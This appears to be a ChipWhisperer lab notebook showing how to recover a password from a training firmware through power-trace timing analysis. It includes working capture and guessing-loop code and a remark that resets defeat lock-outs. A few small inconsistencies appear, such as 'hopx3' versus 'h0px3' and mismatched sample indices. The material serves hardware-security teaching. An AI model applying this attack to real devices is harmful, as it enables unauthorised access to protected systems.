# Timing Analysis with Power for Password Bypass

This tutorial will introduce you to breaking devices by determining when a device is performing certain operations. It will use a simple password check, and demonstrate how to perform a basic power analysis.

Note this is not a prerequisite to the tutorial on breaking AES. You can skip this tutorial if you wish to go ahead with the AES tutorial.

In [ ]:
SCOPETYPE = 'OPENADC'
PLATFORM = 'CWLITEARM'
CRYPTO_TARGET = 'NONE'

## Firmware

Like before, we'll need to setup our `PLATFORM`, then build the firmware:

In [ ]:
%%bash -s "$PLATFORM" "$CRYPTO_TARGET"
cd ../hardware/victims/firmware/basic-passwdcheck
make PLATFORM=$1 CRYPTO_TARGET=$2

## Setup

Setup is the same as usual, except this time we'll be capturing 2000 traces.

In [ ]:
%run "Helper_Scripts/Setup.ipynb"

In [ ]:
fw_path = '../hardware/victims/firmware/basic-passwdcheck/basic-passwdcheck-{}.hex'.format(PLATFORM)

In [ ]:
cw.programTarget(scope, prog, fw_path)

## Communicating With The Target

As was mentioned at the beginning of the tutorial, the firmware we loaded onto the target implements a basic password check. After getting a `'\n'` terminated password, the target checks it and enters an infinite loop, so before communicating with it, we'll need to reset it.

We'll be doing this a lot, so we'll define a function that resets the target (this function is also available by running "Helper_Scripts/Setup.ipynb" as we did above):

In [ ]:
import time
def reset_target(scope):
    if PLATFORM == "CW303" or PLATFORM == "CWLITEXMEGA":
        scope.io.pdic = 'low'
        time.sleep(0.05)
        scope.io.pdic = 'high'
        time.sleep(0.05)
    else:  
        scope.io.nrst = 'low'
        time.sleep(0.05)
        scope.io.nrst = 'high'
        time.sleep(0.05)

The target sends some text to us upon starting. After running the block below, you should see some text appear.

In [ ]:
ret = ""
reset_target(scope)

num_char = target.ser.inWaiting()
while num_char > 0:
    ret += target.ser.read(num_char, 10)
    time.sleep(0.05)
    num_char = target.ser.inWaiting()
    
print(ret)

Now we can send the target a password:

In [ ]:
target.ser.flush()
target.ser.write("h0px3\n")

And get the response. We sent it the right password (hopx3), so you should see "Access granted, Welcome!":

In [ ]:
num_char = target.ser.inWaiting()
print(target.ser.read(num_char, 10))

**tip**

In real systems, you may often know one of the passwords, which is sufficient to investigate the password checking routines as we will do. You also normally have an ability to reset passwords to default. While the reset procedure would erase any data you care about, the attacker will be able to use this 'sacrificial' device to learn about possible vulnerabilities. So the assumption that we have access to the password is really just saying we have access to a password, and will use that knowledge to break the system in general.

## Recording Traces

Now that we can communicate with our super-secure system, our next goal is to get a power trace while the target is running. To do this, we'll arm the scope just before we send our password attempt, then record the trace as we've done before.

In [ ]:
if PLATFORM == "CWNANO":
    scope.adc.samples = 800
else:
    scope.adc.samples = 2000

In [ ]:
ret = ""
reset_target(scope)
num_char = target.ser.inWaiting()
while num_char > 0:
    ret += target.ser.read(num_char, 10)
    time.sleep(0.01)
    num_char = target.ser.inWaiting()
    
print(ret)
scope.arm()
target.ser.flush()
target.ser.write("h0px3\n")
while target.isDone() is False and timeout:
    timeout -= 1
    time.sleep(0.01)

try:
    ret = scope.capture()
    if ret:
        print('Timeout happened during acquisition')
except IOError as e:
    print('IOError: %s' % str(e))
        
trace = scope.getLastTrace()
resp = ""
num_char = target.ser.inWaiting()
while num_char > 0:
    resp += target.ser.read(num_char, 10)
    time.sleep(0.01)
    num_char = target.ser.inWaiting()
print(resp)

Now that we have a trace, we'll use bokeh to plot it:

In [ ]:
from bokeh.plotting import figure, show 
from bokeh.io import output_notebook
from bokeh.models import CrosshairTool

output_notebook()
p = figure()
x_range = range(0, len(trace))
p.line(x_range, trace)
show(p)

## Timing Analysis

Now that we can capture traces, we can begin planning our attack. First we'll make a function to guess a password and return a power trace, since we'll be repeating those steps a lot:

In [ ]:
def cap_pass_trace(pass_guess):
    ret = ""
    reset_target(scope)
    num_char = target.ser.inWaiting()
    while num_char > 0:
        ret += target.ser.read(num_char, 10)
        time.sleep(0.01)
        num_char = target.ser.inWaiting()

    scope.arm()
    target.ser.write(pass_guess)
    while target.isDone() is False and timeout:
        timeout -= 1
        time.sleep(0.01)

    try:
        ret = scope.capture()
        if ret:
            print('Timeout happened during acquisition')
    except IOError as e:
        print('IOError: %s' % str(e))

    trace = scope.getLastTrace()
    num_char = target.ser.inWaiting()
    return trace

Next, we'll try two different passwords and see if the power traces differ by length. We'll then plot both traces on the same figure (with the first in red and the second in blue).

In [ ]:
trace = cap_pass_trace("\n")
new_trace = cap_pass_trace("h\n")
x_range = range(0, len(new_trace))
p = figure()
p.add_tools(CrosshairTool())
p.line(x_range, new_trace)
p.line(x_range, trace, line_color='red')
show(p)

You should see both traces start and end similarly, but differ elsewhere. If you look closely, you should see that the blue trace looks a lot like the red trace but shifted later in time. We'll use this timing difference to break the password!

Edit the above block to try different passwords and see how it changes for different lengths and number of correct characters. 

Go back to the original guesses (`"\n"` and `"h\n"`) and find some distinct spikes that get shifted in time. Your target may differ, but in my case, there were some distinct spikes of about -0.21 at 217 in red and 253 in blue. The plot is interactive, so you can zoom in and move around using the buttons on the right side of the plot. Record their locations, value, and the difference in location (in my case, 217, 253, -0.21, and 36).

## Attacking a Single Letter

Now that we've located a distinctive timing difference, we can start building our attack. We'll start with a single letter, since that will quickly give us some feedback on the attack.

The plan for the attack is simple: keep guessing letters until we no longer see the distinctive spike in the original location. To do this, we'll create a loop that:
* Figures out our next guess
* Does the capture and records the trace
* Checks if sample 217 is larger than -0.2 (replace with appropriate values)

The below loop finds the first correct character, prints it, then ends. You should see "Success: h" after a while.

In [ ]:
trylist = "abcdefghijklmnopqrstuvwxyz0123456789"
password = ""
for c in trylist:
    next_pass = password + c + "\n"
    trace = cap_pass_trace(next_pass)
    if trace[121] > -0.3:
        print("Success: " + c)
        break

## Attacking the Full Password

Now that we can guess a single character, attacking the rest is easy; we just need to repeat the process in another loop, move the check point (this is the change is location you recorded earlier), and update our guess with the new correct letter.

After updating the below script and running it, you should see parts of the password printed out as each letter is found.

In [ ]:
trylist = "abcdefghijklmnopqrstuvwxyz0123456789"
password = ""
def checkpass(trace, i):
    if PLATFORM == "CWNANO":
        return trace[274 + 11*i] > -0.15
    elif PLATFORM == "CWLITEARM" or PLATFORM == "CW308_STM32F3":
        return trace[229 + 36*i] > -0.2
    elif PLATFORM == "CW303" or PLATFORM == "CWLITEXMEGA":
        return trace[121 + 72 * i] > -0.3

for i in range(5):
    for c in trylist:
        next_pass = password + c + "\n"
        trace = cap_pass_trace(next_pass)
        if checkpass(trace, i):
            password += c
            print("Success, pass now {}".format(password))
            break

That's it! You should have successfully cracked a password using the timing attack. Some notes on this method:
* The target device has a finite start-up time, which slows down the attack. If you wish, remove some of the `printf()`'s from the target code, recompile and reprogram, and see how quickly you can do this attack.
* The current script doesn't look for the "WELCOME" message when the password is OK. That is an extension that allows it to crack any size password.
* If there was a lock-out on a wrong password, the system would ignore it, as it resets the target after every attempt.

## Conclusion

This tutorial has demonstrated the use of the power side-channel for performing timing attacks. A target with a simple password-based security system is broken.

## Tests

In [ ]:
assert (password == "h0px3"), "Failed to break password, got {}".format(password)